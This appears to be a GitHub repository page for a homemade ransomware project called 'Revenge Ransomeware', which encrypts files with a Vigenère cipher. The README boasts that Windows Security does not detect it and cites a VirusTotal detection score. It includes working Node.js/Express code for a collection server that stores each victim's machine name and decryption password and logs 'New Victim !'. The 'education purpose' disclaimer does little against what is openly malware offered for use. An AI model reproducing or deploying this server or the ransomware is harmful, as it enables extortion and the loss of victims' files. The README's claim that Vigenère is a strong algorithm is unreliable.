Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

REVENGE977/Revenge-Ransomeware

Open more actions menu

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

38 Commits
38 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

REVENGE RANSOMEWARE

a vigenere encrypt ransomeware created by me :p, for education purpose. MAKE SURE TO STAR THE REPOSITORY :)

Used Algorithm

  • Vigenere (which is strong algorithm)

DISCLAIMER

i didnt try this fully, so try it on virtual machine to make sure it works perfectly, If you encounter any problems tell me in issues also i created this only for education purposes, also windows security wont detect this ransomeware :)

Express Node.js Server (To Get The Password For Decrypt) Example:

const express = require("express");
const bodyParser = require("body-parser");
const fs = require("fs");
const app = express();

app.use(express.static(__dirname + "/public"));
app.use(bodyParser.json())
//url.com/new
app.post('/new', (req, res) => {
  var pcname = req.body.user;
  var password = req.body.pass;

  var createStream = fs.createWriteStream(`public/${pcname}.txt`);
  createStream.end();
  
  fs.writeFile(`./public/${pcname}.txt`, `password=${password}`, (err) => {
    if(err) return console.log(err);
    console.log("New Victim !")
  });
  res.send("done")
})

const listener = app.listen(3000, () => {
  console.log("Your app is listening on port 3000");
});
 

Detection

15/72 Virustotal Scan Result

virustotal

Change Log:

  • Now includes the decryption software :)

decryptsoftware

  • Now supports encrypting folders .
Morty Proxy This is a proxified and sanitized view of the page, visit original site.